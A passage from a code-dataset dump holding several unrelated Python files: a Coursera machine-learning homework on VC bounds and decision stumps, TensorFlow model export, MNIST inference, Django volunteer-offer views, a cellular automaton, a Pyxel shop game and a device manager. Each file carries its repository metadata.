math.sqrt((8 / N)*math.log((4 * ((2 * N)**d_vc))/ delta))\n\n # Rademacher Penalty Bound\n elpsilon2 = math.sqrt(2 * sympy.log((2 * N * ((N)**d_vc)))/ N) + math.sqrt((2/N)* sympy.log(1/delta)) + 1 / N\n\n # Parrondo and Van den Broek\n elpsilon3 = sympy.Symbol(\"elpsilon3\")\n lnFactor = round(math.log((6 * ((2 * N)**d_vc))/ delta),2)\n elpsilon3 = sympy.solve(sympy.sqrt((2 * elpsilon3 + lnFactor)/ N) - elpsilon3,elpsilon3)\n\n # Devroye\n elpsilon4 = sympy.Symbol(\"elpsilon4\")\n exp1 = 4 * (Decimal(N ** 2) ** d_vc)/ Decimal(delta)\n lnFactor = exp1.ln() # math.log返回inf\n elpsilon4 = sympy.solve(sympy.sqrt((1 / (2 * N)) * (4 * elpsilon4 * (1 + elpsilon4) + lnFactor)) - elpsilon4,elpsilon4)\n\n # Variant VC bound\n elpsilon5 = sympy.Symbol(\"elpsilon5\")\n elpsilon5 = math.sqrt((16 / N) * math.log((2 * ((N) ** d_vc))/sympy.sqrt(delta)))\n\n print ('Original VC bound',elpsilon1,\n '\\nRademacher Penalty Bound: ',elpsilon2,\n '\\nParrondo and Van den Broek: ',elpsilon3[0],\n '\\nDevroye: ',elpsilon4[0],\n '\\nelpsilon5: ',elpsilon5)\n\ndef sign(x):\n if x <= 0:\n return -1\n return 1\n\n\ndef DoQuestion17_method1():\n LoopNum = 5000\n dataLen = 20\n noiseProbality = 0.2\n\n Sum_Ein = 0\n Sum_Eout = 0\n for loop in range(LoopNum):\n E_in,E_out = SearchEinInPositiveAndNegativeRays(dataLen,noiseProbality)\n Sum_Ein += E_in\n Sum_Eout += E_out\n print ('Average E_in:',Sum_Ein / LoopNum,',Average E_out:',Sum_Eout / LoopNum)\n\n\ndef SearchEinInPositiveAndNegativeRays(dataLen,noiseProbality):\n data = np.random.uniform(low=-1.0, high=1.0, size=dataLen)\n data = sorted(data) # 这个排序属于隐藏条件,不排序E_in只有0.3,排序后有0.15\n s_x = [sign(element) for element in data]\n noiseLocation = np.random.random_integers(low=0, high=dataLen - 1, size=int(dataLen * noiseProbality))\n\n for theta in range(int(dataLen * noiseProbality)): # 随机生成四个位置设置为噪点,将符号位取反\n s_x[noiseLocation[theta]] = -1 * s_x[noiseLocation[theta]]\n\n Ein = len(s_x)\n LocationOfMinE_in = 0\n signOfMinE_in = -1\n leftSign = -1\n rightSign = 1\n for symbor in range(2): # 因为是 positive and negative rays 所以需要尝试两次\n leftSign = -1 * leftSign\n rightSign = -1 * rightSign\n for theta in range(len(s_x) + 1):\n leftErrorNum = 0\n rightErrorNum = 0\n leftNum = 0\n rightNum = 0\n for i in range(theta):\n if i >= len(s_x):\n continue\n leftNum += 1\n if leftSign != s_x[i]:\n leftErrorNum += 1\n for i in range(len(s_x) + 1 - theta):\n if i + theta >= len(s_x):\n continue\n rightNum += 1\n if rightSign != s_x[i + theta]:\n rightErrorNum += 1\n sumError = leftErrorNum + rightErrorNum\n if (sumError < Ein):\n Ein = sumError\n LocationOfMinE_in = theta\n signOfMinE_in = leftSign\n\n if LocationOfMinE_in + 1 < len(s_x):\n bestTheta = (s_x[LocationOfMinE_in] + s_x[LocationOfMinE_in + 1])/2\n else:\n bestTheta = 1\n E_out = 0.5 + 0.3 * signOfMinE_in * (np.abs(bestTheta) - 1)\n print ('ErrorRate: ',Ein/len(s_x),LocationOfMinE_in,',E_out: ',E_out)\n return Ein/len(s_x), E_out\n\ndef signArray(x):#自定义符号函数,只返回-1,+1\n ret=np.ones(x.shape)\n for i,each in enumerate(x):\n if each<0: ret[i]=-1\n return ret\n\ndef getTheta(x): # 由输入的x生成假设空间的所有theta的序列\n n = len(x)\n l1 = sorted(x) #为什么要排序?\n theta = np.zeros(n)\n for i in range(n - 1):\n theta[i] = (l1[i] + l1[i + 1]) / 2\n theta[-1] = 1\n return theta\n\n\ndef DoQuestion17_method2():\n data_size = 3\n expes = 5000\n E_in = 0\n E_out = 0\n for i in range(expes):\n x = np.random.uniform(-1, 1, data_size)\n noise_rate = 0.2\n # 生成[-0.2,0.8]范围内的随机数组,取sign()即变为有20%的-1的随机数组\n noise = signArray(np.random.uniform(size=data_size) - noise_rate)\n y = signArray(x) * noise # 为y加上20%的噪声\n theta = getTheta(x)\n print(x)\n print(theta)\n e_in = np.zeros((2, data_size)) # 对每个theta求出一个error_in,第一行是s=1,第2行是s=-1.\n for i in range(len(theta)):\n a1 = y * signArray(x - theta[i])\n print ('a1:',a1,',np.sum(a1):',np.sum(a1),',np.sum(-a1):',np.sum(-a1))\n e_in[0][i] = (data_size - np.sum(a1)) / (2 * data_size) # 数组只有-1和+1,可直接计算出-1所占比例\n e_in[1][i] = (data_size - np.sum(-a1)) / (2 * data_size)\n print ('E_in[0]:',e_in[0][i],',e_in[1][i]:',e_in[1][i])\n s = 0\n theta_best = 0\n min0, min1 = np.min(e_in[0]), np.min(e_in[1])\n if min0 < min1:\n s = 1\n theta_best = theta[np.argmin(e_in[0])]\n else:\n s = -1\n theta_best = theta[np.argmin(e_in[1])]\n e_out = 0.5 + 0.3 * s * (np.abs(theta_best) - 1)\n E_in += np.min(e_in)\n E_out += np.min(e_out)\n ave_in = E_in / expes\n ave_out = E_out / expes\n print(ave_in,ave_out)\n\n\ndef TestSympy():\n a = sympy.Symbol('a')\n y = sympy.solve(sympy.sqrt(2*a)-4,a)\n print (y)\n\n\ndef LoadDataInfo(file):\n data = []\n label = []\n lineNum = 0\n with open(file) as f:\n line = f.readline()\n while line:\n lineArray = line.split()\n for i in range(len(lineArray) - 1):\n data.append(float(lineArray[i]))\n label.append(int(lineArray[9]))\n line = f.readline()\n lineNum += 1\n dataArray = np.array(data)\n dataArray = dataArray.reshape(lineNum,9)\n\n labelArray = np.array(label)\n return dataArray,labelArray\n\n\ndef DoDecisionStump(data, label):\n data_size = len(data)\n theta = getTheta(data)\n e_in = np.zeros((2, data_size))\n for i in range(len(theta)):\n a1 = label * signArray(data - theta[i])\n e_in[0][i] = (data_size - np.sum(a1)) / (2 * data_size)\n e_in[1][i] = (data_size - np.sum(-a1)) / (2 * data_size)\n\n s = 0\n min0, min1 = np.min(e_in[0]), np.min(e_in[1])\n if min0 < min1:\n s = 1\n theta_best = theta[np.argmin(e_in[0])]\n else:\n s = -1\n theta_best = theta[np.argmin(e_in[1])]\n E_in = np.min(np.min(e_in))\n return s, theta_best, E_in\n\ndef getData_i(X_train,i):#获取第d维数据\n return np.reshape(X_train[:,i],len(X_train))#从ndarray二维数组转为array一维数组\n\n\ndef DoQuestion19():\n PlaFilePath = 'G:\\\\林轩田教程\\\\MachineLearningFoundations\\\\homework2\\\\data\\\\decisionTrumpTrainData.txt'\n data, label = LoadDataInfo(PlaFilePath)\n e_in = np.zeros(9)\n s = np.zeros(9)\n theta = np.zeros(9)\n\n for i in range(9):\n s[i], theta[i], e_in[i] = DoDecisionStump(getData_i(data,i),label)\n\n E_in = np.min(e_in)\n dimension = np.argmin(e_in)\n theta_best = theta[dimension]\n s_best = s[dimension]\n\n PlaFilePath = 'G:\\\\林轩田教程\\\\MachineLearningFoundations\\\\homework2\\\\data\\\\decisionTrumpTestData.txt'\n data, label = LoadDataInfo(PlaFilePath)\n test_len = len(label)\n X_i = getData_i(data, dimension)\n q = label * s_best * signArray(X_i - theta_best)\n E_out = (test_len - np.sum(q)) / (2 * test_len)\n print(E_in, E_out)\n\nif __name__ == \"__main__\":\n # DoQuestion3()\n #DoQuestion4And5()\n\n #DoQuestion17_method1()\n DoQuestion17_method2() # 网上提供的另外一种思路\n #DoQuestion19()\n pass\n","repo_name":"SailBlade/MachineLearningFoundations_Coursera","sub_path":"homework2/homeWork2.py","file_name":"homeWork2.py","file_ext":"py","file_size_in_byte":8950,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"73432589124","text":"import tensorflow as tf\nimport os\nimport freeze_graph\n\n\ndef freeze_model(input_graph_path,output_graph_path,output_node_names,checkpoint_path):\n # routine.\n input_saver_def_path = \"\"\n input_binary = False\n restore_op_name = \"save/restore_all\"\n filename_tensor_name = \"save/Const:0\"\n clear_devices = False\n\n freeze_graph.freeze_graph(input_graph_path, input_saver_def_path,\n input_binary, checkpoint_path,\n output_node_names, restore_op_name,\n filename_tensor_name, output_graph_path,\n clear_devices, \"\")\n\n\ndef load_model(frozen_graph_filename):\n # First we need to load the protobuf file from the disk and parse it to retrieve the \n # Unserialized graph_def\n with tf.gfile.GFile(frozen_graph_filename, \"rb\") as f:\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f.read())\n\n # Then, we can use again a convenient built-in function to import a graph_def into the \n # current default Graph\n with tf.Graph().as_default() as graph:\n tf.import_graph_def(\n graph_def, \n input_map=None, \n return_elements=None, \n name=\"prefix\", \n op_dict=None, \n producer_op_list=None\n )\n return graph","repo_name":"ivancruzbht/TextCNN","sub_path":"model_export.py","file_name":"model_export.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"99"} +{"seq_id":"28816046646","text":"# coding: utf-8\nimport sys, os\nsys.path.append(os.pardir) # 親ディレクトリのファイルをインポートするための設定\nimport numpy as np\nimport pickle\nfrom dataset.mnist import load_mnist\nfrom common.functions import sigmoid, softmax\n\n\ndef get_data():\n (x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, flatten=True, one_hot_label=False)\n return x_test, t_test\n\n\ndef init_network():\n #pklファイルには重みとバイアスのパラメータがディクショナリ型の変数として保存されたいる\n with open(\"deep-learning-from-scratch-master\\ch03\\sample_weight.pkl\", 'rb') as f:\n network = pickle.load(f)\n return network\n\n\ndef predict(network, x):\n W1, W2, W3 = network['W1'], network['W2'], network['W3']\n b1, b2, b3 = network['b1'], network['b2'], network['b3']\n\n a1 = np.dot(x, W1) + b1\n z1 = sigmoid(a1)\n a2 = np.dot(z1, W2) + b2\n z2 = sigmoid(a2)\n a3 = np.dot(z2, W3) + b3\n y = softmax(a3)\n\n return y\n\n#xは実際試験する問題,tはxの解答\nx, t = get_data()\nnetwork = init_network()\n\n#バッチ数\nbatch_size = 100\n\naccuracy_cnt = 0\n#xに格納された画像データを一枚ずつ分類\n#len関数は,リストや辞書のサイズを取得する\n#range関数は(start,end,step)のような書き方でstartからend-1までの整数からなるリストを作成する\n#さらに,リストの要素の次の値がstepで指定された値だけ増加するリストを作成\nfor i in range(0, len(x), batch_size):\n #x[0:100],x[100:200]の順で作成していく\n x_batch = x[i:i+batch_size]\n y_batch = predict(network, x_batch)\n #axsis = 1により,100×10の配列の中で一次元目の要素ごとに,最大値のインデックスを求める\n p = np.argmax(y_batch, axis=1)\n accuracy_cnt += np.sum(p == t[i:i+batch_size])\n\n\n # y = predict(network, x[i])\n # 最も確率の高い要素のインデックスを取得(引数に与えられた配列の要素の中から最大の値を取得)\n # p= np.argmax(y) \n # if p == t[i]:\n #正解した割合を認識精度としている\n # accuracy_cnt += 1\n\nprint(\"Accuracy:\" + str(float(accuracy_cnt) / len(x)))\n\n#そもそもなぜ正規化するのか?\n#端的に言うと,いろんな単位のデータを入力としてディープラーニングで学習させるより,\n# 共通の尺度で統一された値を入力データとして与えた方が精度がいい学習モデルができるから\n","repo_name":"souta1214/souta_study","sub_path":"deep-learning-from-scratch-master/ch03/neuralnet_mnist.py","file_name":"neuralnet_mnist.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74420667524","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n.. module:: offers\n\"\"\"\n\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom django.http import HttpResponseForbidden\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.utils.text import slugify\nfrom django.views.generic import View\n\nfrom apps.volontulo.forms import OfferApplyForm\nfrom apps.volontulo.lib.email import send_mail\nfrom apps.volontulo.models import Offer\nfrom apps.volontulo.models import UserProfile\nfrom apps.volontulo.utils import correct_slug\nfrom apps.volontulo.views import logged_as_admin\n\n\nclass OffersList(View):\n \"\"\"View that handle list of offers.\"\"\"\n\n @staticmethod\n def get(request):\n \"\"\"It's used for volunteers to show active ones and for admins to show\n all of them.\n\n :param request: WSGIRequest instance\n \"\"\"\n if logged_as_admin(request):\n offers = Offer.objects.all()\n else:\n offers = Offer.objects.get_active()\n\n return render(request, \"offers/offers_list.html\", context={\n 'offers': offers,\n })\n\n @staticmethod\n def post(request):\n \"\"\"Method responsible for rendering form for new offer.\n\n :param request: WSGIRequest instance\n \"\"\"\n if (\n request.POST.get('edit_type') == 'status_change' and\n request.POST.get('offer_id')\n ):\n offer = get_object_or_404(Offer, id=request.POST.get('offer_id'))\n offer.publish()\n messages.success(request,\n \"Aktywowałeś ofertę '%s'\" % offer.title)\n return redirect('offers_list')\n\n\nclass OffersReorder(View):\n \"\"\"Class view supporting change of a offer.\"\"\"\n\n def dispatch(self, request, *args, **kwargs):\n user = self.request.user\n if (\n not user.is_authenticated() or\n not user.userprofile.is_administrator\n ):\n return redirect('offers_list')\n return super(OffersReorder, self).dispatch(request, *args, **kwargs)\n\n @staticmethod\n def get(request, id_):\n \"\"\"Display offer list with weights GET request.\n\n :param request: WSGIRequest instance\n :param id_:\n :return:\n \"\"\"\n offers = Offer.objects.get_weightened()\n return render(request, 'offers/reorder.html', {\n 'offers': offers, 'id': id_})\n\n @staticmethod\n def post(request, _):\n \"\"\"Display offer list with weights GET request.\n\n :param request:\n :param id_: Integer newly created offer id\n :return:\n \"\"\"\n if request.POST.get('submit') == 'reorder':\n items = [item\n for item\n in request.POST.items()\n if item[0].startswith('weight_')]\n weights = {id_.split('_')[1]: weight\n for id_, weight in items}\n for id_, weight in weights.items():\n Offer.objects.filter(id=id_).update(weight=weight)\n\n messages.success(\n request,\n \"Uporządkowano oferty.\"\n )\n return redirect('offers_list')\n\n\nclass OffersAccept(View):\n \"\"\" Class view responsible for acceptance of offers \"\"\"\n\n @staticmethod\n def get(request, pk): # pylint: disable=invalid-name\n \"\"\"Method which allows to delete selected offer\n\n :param request: WSGIRequest instance\n :param pk: Offer id\n \"\"\"\n offer = get_object_or_404(Offer, pk=pk)\n if (\n request.user.is_authenticated() and\n request.user.userprofile.is_administrator\n ):\n offer.publish()\n messages.info(request, \"Oferta została zaakceptowana.\")\n return redirect(settings.ANGULAR_ROOT)\n\n return HttpResponseForbidden()\n\n\nclass OffersJoin(View):\n \"\"\"Class view supporting joining offer.\"\"\"\n\n @staticmethod\n @correct_slug(Offer, 'offers_join', 'title')\n def get(request, slug, id_): # pylint: disable=unused-argument\n \"\"\"View responsible for showing join form for particular offer.\"\"\"\n if request.user.is_authenticated():\n has_applied = Offer.objects.filter(\n volunteers=request.user,\n volunteers__offer=id_,\n ).count()\n if has_applied:\n messages.error(\n request,\n \"Już wyraziłeś chęć uczestnictwa w tej ofercie.\"\n )\n return redirect('offers_list')\n\n offer = Offer.objects.get(id=id_)\n\n context = {\n 'form': OfferApplyForm(),\n 'offer': offer,\n 'MEDIA_URL': settings.MEDIA_URL,\n }\n\n context['volunteer_user'] = UserProfile()\n if request.user.is_authenticated():\n context['volunteer_user'] = request.user.userprofile\n\n return render(\n request,\n 'offers/offer_apply.html',\n context\n )\n\n @staticmethod\n @correct_slug(Offer, 'offers_join', 'title')\n def post(request, slug, id_): # pylint: disable=unused-argument\n \"\"\"View responsible for saving join for particular offer.\"\"\"\n form = OfferApplyForm(request.POST)\n offer = Offer.objects.get(id=id_)\n if form.is_valid():\n if request.user.is_authenticated():\n user = request.user\n else:\n user = User.objects.filter(\n email=request.POST.get('email')\n ).exists()\n\n if user:\n messages.info(\n request,\n \"Zaloguj się, aby zapisać się do oferty.\"\n )\n return redirect(\n '{ANGULAR_ROOT}/login?next={path}'.format(\n ANGULAR_ROOT=settings.ANGULAR_ROOT,\n path=request.path,\n )\n )\n\n messages.info(\n request,\n \"Zarejestruj się, aby zapisać się do oferty.\"\n )\n return redirect('{ANGULAR_ROOT}/register'.format(\n ANGULAR_ROOT=settings.ANGULAR_ROOT\n ))\n\n has_applied = Offer.objects.filter(\n volunteers=user,\n volunteers__offer=id_,\n ).count()\n if has_applied:\n messages.error(\n request,\n \"Już wyraziłeś chęć uczestnictwa w tej ofercie.\"\n )\n return redirect('offers_list')\n\n offer.volunteers.add(user)\n offer.save()\n send_mail(\n request,\n 'offer_application',\n [\n userprofile.user.email\n for userprofile in offer.organization.userprofiles.all()\n ],\n dict(\n email=request.POST.get('email'),\n phone_no=request.POST.get('phone_no'),\n fullname=request.POST.get('fullname'),\n comments=request.POST.get('comments'),\n offer=offer,\n )\n )\n messages.success(\n request,\n \"Zgłoszenie chęci uczestnictwa zostało wysłane.\"\n )\n return redirect(\n '{ANGULAR_ROOT}/offers/{slug}/{id}'.format(\n ANGULAR_ROOT=settings.ANGULAR_ROOT,\n slug=slugify(offer.title),\n id=str(offer.id),\n )\n )\n else:\n errors = \"
\".join(form.errors)\n messages.error(\n request,\n \"Formularz zawiera nieprawidłowe dane\" + errors\n )\n volunteer_user = UserProfile()\n if request.user.is_authenticated():\n volunteer_user = request.user.userprofile\n return render(\n request,\n 'offers/offer_apply.html',\n {\n 'offer': offer,\n 'form': form,\n 'volunteer_user': volunteer_user,\n }\n )\n","repo_name":"CodeForPoznan/volontulo","sub_path":"backend/apps/volontulo/views/offers.py","file_name":"offers.py","file_ext":"py","file_size_in_byte":8365,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"99"} +{"seq_id":"39352937972","text":"import automata_celular as ac\nfrom PIL import Image\n\n### Función auxiliar para pintar matriz en png -----------------\ndef plot_estado(num_rows, num_cols, estado, filename):\n cell_size = 40\n image = Image.new(mode='L', size=(cell_size*num_cols, cell_size*num_rows), color='white')\n \n for i in range(num_rows):\n for j in range(num_cols):\n state = estado[i*num_rows+j]\n color = 0 if state == 1 else 255\n x = j * cell_size\n y = i * cell_size\n for dy in range(cell_size):\n for dx in range(cell_size):\n image.putpixel((x+dx, y+dy), color)\n image.save(filename + \".png\")\n### -------------------------------------------------------------\n\ndef main():\n m = 6\n n = 6\n estado_inicial = [1,0,1,1,0,1,\n 0,0,1,1,0,0,\n 1,0,0,0,0,1,\n 1,0,1,1,0,1,\n 0,0,0,0,0,0,\n 0,1,1,1,1,0]\n mundo = ac.Mundo(m,n,estado_inicial)\n plot_estado(m, n, mundo.estado, \"output/P1A/1A_mundo0\")\n mundo.actualiza()\n plot_estado(m, n, mundo.estado, \"output/P1A/1A_mundo1\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"daviloncio/repositorio1","sub_path":"P1A_EX1.py","file_name":"P1A_EX1.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70880300164","text":"import pyxel\n\nclass Option:\n def __init__(self, x, y, side, color):\n self.x = x\n self.y = y\n self.side = side\n self.color = color\n\nclass App:\n def __init__(self):\n pyxel.init(256, 256, caption=\"General Store\", fullscreen=True)\n pyxel.image(0).load(0, 0, \"assets/store.jpg\")\n \n pyxel.mouse(True)\n\n self.cart = [[],[]]\n self.cash = 100\n self.option1 = Option(2,200,5,7)\n self.option2 = Option(2,210,5,7)\n self.option3 = Option(2,220,5,7)\n self.option4 = Option(2,230,5,7)\n self.gender = 1\n self.storeText = 0\n self.cartText = 0\n \n # EVERYTHING MUST BE ABOVE THIS LINE\n pyxel.run(self.update, self.draw)\n \n def update(self):\n if pyxel.btnp(pyxel.KEY_Q):\n pyxel.quit()\n if pyxel.btnp(pyxel.KEY_R):\n self.storeText = 0\n self.cartText = 0\n if pyxel.btnp(pyxel.KEY_ENTER):\n self.storeText = 0\n #Transition!!\n if pyxel.btnp(pyxel.MOUSE_LEFT_BUTTON):\n if(pyxel.mouse_x > self.option1.x and pyxel.mouse_x < (self.option1.x + self.option1.side) and pyxel.mouse_y > self.option1.y and pyxel.mouse_y < (self.option1.y + self.option1.side)):\n if(self.storeText == 1):\n self.cash -= 2\n if(\"Maple Syrup\" not in self.cart[0]):\n self.cart[0].append(\"Maple Syrup\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Maple Syrup\")] += 1\n elif(self.storeText == 2):\n self.cash -= 3\n if(\"Mittens\" not in self.cart[0]):\n self.cart[0].append(\"Mittens\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Mittens\")] += 1\n elif(self.storeText == 3):\n self.cash -= 20\n if(\"Fishing Rod\" not in self.cart[0]):\n self.cart[0].append(\"Fishing Rod\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Fishing Rod\")] += 1\n if self.storeText == 0:\n self.storeText = 1\n if(pyxel.mouse_x > self.option2.x and pyxel.mouse_x < (self.option2.x + self.option2.side) and pyxel.mouse_y > self.option2.y and pyxel.mouse_y < (self.option2.y + self.option2.side)):\n if(self.storeText == 1):\n self.cash -= 5\n if(\"Bread\" not in self.cart[0]):\n self.cart[0].append(\"Bread\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Bread\")] += 1\n elif(self.storeText == 2):\n self.cash -= 7\n if(\"Toque\" not in self.cart[0]):\n self.cart[0].append(\"Toque\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Toque\")] += 1\n elif(self.storeText == 3):\n self.cash -= 25\n if(\"Medicine\" not in self.cart[0]):\n self.cart[0].append(\"Medicine\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Medicine\")] += 1\n if self.storeText == 0:\n self.storeText = 3\n if(pyxel.mouse_x > self.option3.x and pyxel.mouse_x < (self.option3.x + self.option3.side) and pyxel.mouse_y > self.option3.y and pyxel.mouse_y < (self.option3.y + self.option3.side)):\n if(self.storeText == 1):\n self.cash -= 10\n if(\"Canned Beans\" not in self.cart[0]):\n self.cart[0].append(\"Canned Beans\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Canned Beans\")] += 1\n elif(self.storeText == 2):\n self.cash -= 12\n if(\"Boots\" not in self.cart[0]):\n self.cart[0].append(\"Boots\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Boots\")] += 1\n elif(self.storeText == 3):\n self.cash -= 30\n if(\"Trap\" not in self.cart[0]):\n self.cart[0].append(\"Trap\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Trap\")] += 1\n if self.storeText == 0:\n self.storeText = 3\n if(pyxel.mouse_x > self.option4.x and pyxel.mouse_x < (self.option4.x + self.option4.side) and pyxel.mouse_y > self.option4.y and pyxel.mouse_y < (self.option4.y + self.option4.side)):\n if(self.storeText == 1):\n self.cash -= 25\n if(\"Canadian Bacon\" not in self.cart[0]):\n self.cart[0].append(\"Canadian Bacon\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Canadian Bacon\")] += 1\n elif(self.storeText == 2):\n self.cash -= 20\n if(\"Coat\" not in self.cart[0]):\n self.cart[0].append(\"Coat\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Coat\")] += 1\n elif(self.storeText == 3):\n self.cash -= 50\n if(\"Tent\" not in self.cart[0]):\n self.cart[0].append(\"Tent\")\n self.cart[1].append(1)\n else:\n self.cart[1][self.cart[0].index(\"Tent\")] += 1\n if self.storeText == 0:\n self.cartText = 1\n\n def draw(self):\n # CLEAR SCREEN\n pyxel.cls(0)\n\n # BACKGROUND\n # blt(x, y, img, u, v, w, h, [colkey]) colkey is optional\n pyxel.blt(0, 0, 0, 0, 0, 256, 256)\n\n # DRAW BLACK TEXTBOX\n # rect(x, y, w, h, col)\n pyxel.rect(0, 180, 256, 76, 0)\n\n # TEXT\n if(self.gender == 1):\n self.genderText = \"guy\"\n elif(self.gender == 2):\n self.genderText = \"gal\"\n else:\n self.genderText = \"pal\"\n\n pyxel.text(2, 182, \"\\\"Mornin', what will a young \" + self.genderText + \" like yourself be buying today?\\\" the shopkeeper says gruffly.\", 7)\n\n # OPTIONS\n # One letter - 5x4\n # Where the remaining cash amount will be.s\n pyxel.rect(200, 0, 56, 10, 9)\n pyxel.rectb(200, 0, 56, 10, 0)\n pyxel.text(202, 3, \"Cash:$\" + str(self.cash), 0)\n\n pyxel.rect(self.option1.x, self.option1.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option1.y, \"Food\", 3)\n pyxel.rect(self.option1.x, self.option2.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option2.y, \"Clothing\", 3)\n pyxel.rect(self.option1.x, self.option3.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option3.y, \"Supplies\", 3)\n pyxel.rect(self.option1.x, self.option4.y, self.option4.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option4.y, \"Check your basket\", 3)\n pyxel.text(2, 250, \"Press Enter to checkout your basket.\", 2)\n\n if(self.storeText == 1):\n pyxel.rect(0, 180, 256, 76, 0)\n pyxel.text(2, 182, \"\\\"This is all the grub I have. Should keep your stomach filled.\\\"\", 7)\n pyxel.rect(self.option1.x, self.option1.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option1.y, \"Maple Syrup - $2\", 2)\n pyxel.rect(self.option1.x, self.option2.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option2.y, \"Bread - $5\", 2)\n pyxel.rect(self.option1.x, self.option3.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option3.y, \"Canned Beans - $10\", 2)\n pyxel.rect(self.option1.x, self.option4.y, self.option4.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option4.y, \"Canadian Bacon - $25\", 2)\n pyxel.text(2, 250, \"Press R to return to General Store - Main.\", 2)\n\n elif(self.storeText == 2):\n pyxel.rect(0, 180, 256, 76, 0)\n pyxel.text(2, 182, \"\\\"Should keep yourselves warm. Gets pretty chilly here in Banff.\\\"\", 7)\n pyxel.rect(self.option1.x, self.option1.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option1.y, \"Mittens - $3\", 2)\n pyxel.rect(self.option1.x, self.option2.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option2.y, \"Toque - $7\", 2)\n pyxel.rect(self.option1.x, self.option3.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option3.y, \"Boots - $12\", 2)\n pyxel.rect(self.option1.x, self.option4.y, self.option4.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option4.y, \"Coat - $20\", 2)\n pyxel.text(2, 250, \"Press R to return to General Store - Main.\", 2)\n\n elif(self.storeText == 3):\n pyxel.rect(0, 180, 256, 76, 0)\n pyxel.text(2, 182, \"\\\"Ahh, you're one of those hiker folk. Got quality supplies here.\\\"\", 7)\n pyxel.rect(self.option1.x, self.option1.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option1.y, \"Fishing Rod - $20\", 2)\n pyxel.rect(self.option1.x, self.option2.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option2.y, \"Medicine - $25\", 2)\n pyxel.rect(self.option1.x, self.option3.y, self.option1.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option3.y, \"Trap - $30\", 2)\n pyxel.rect(self.option1.x, self.option4.y, self.option4.side, self.option1.side, self.option1.color)\n pyxel.text(10, self.option4.y, \"Tent - $50\", 2)\n pyxel.text(2, 250, \"Press R to return to General Store - Main.\", 2)\n\n\n if(self.cartText == 1):\n pyxel.rect(0, 180, 256, 76, 0)\n pyxel.text(2, 182, \"Cart:\", 7)\n tempColumn = 190\n for j in range(len(self.cart[0])):\n pyxel.text(2, tempColumn, str(self.cart[0][j]) + \" - \" + str(self.cart[1][j]), 11)\n tempColumn += 8\n pyxel.text(2, 250, \"Press R to return to General Store - Main.\", 2)\n\nApp()","repo_name":"dengpris/calgaryhacks2021","sub_path":"pyxel-master/pyxel/general_store.py","file_name":"general_store.py","file_ext":"py","file_size_in_byte":11130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"7571427257","text":"from .logger import root_logger\nfrom .types.device import Device\nfrom typing import Dict\nfrom threading import Lock\n\n\n\nlogger = root_logger.getChild(__name__.split(\".\", 1)[-1])\n\n\nclass DeviceState:\n online = \"online\"\n offline = \"offline\"\n\n\nclass DeviceManager:\n\n def __init__(self):\n self.__device_pool = dict()\n self.__lock = Lock()\n\n def add(self, device: Device) -> None:\n if not isinstance(device, Device):\n raise TypeError\n self.__lock.acquire()\n if device.id not in self.__device_pool:\n self.__device_pool[device.id] = device\n else:\n logger.warning(\"device '{}' already in pool\".format(device.id))\n self.__lock.release()\n\n def delete(self, device_id: str) -> None:\n if not isinstance(device_id, str):\n raise TypeError\n self.__lock.acquire()\n try:\n del self.__device_pool[device_id]\n except KeyError:\n logger.warning(\"device '{}' does not exist in device pool\".format(device_id))\n self.__lock.release()\n\n def get(self, device_id: str) -> Device:\n if not isinstance(device_id, str):\n raise TypeError\n self.__lock.acquire()\n try:\n device = self.__device_pool[device_id]\n except KeyError:\n logger.error(\"device '{}' not in pool\".format(device_id))\n self.__lock.release()\n raise\n self.__lock.release()\n return device\n\n def clear(self) -> None:\n self.__lock.acquire()\n self.__device_pool.clear()\n self.__lock.release()\n\n @property\n def devices(self) -> Dict[str, Device]:\n self.__lock.acquire()\n devices = self.__device_pool.copy()\n self.__lock.release()\n return 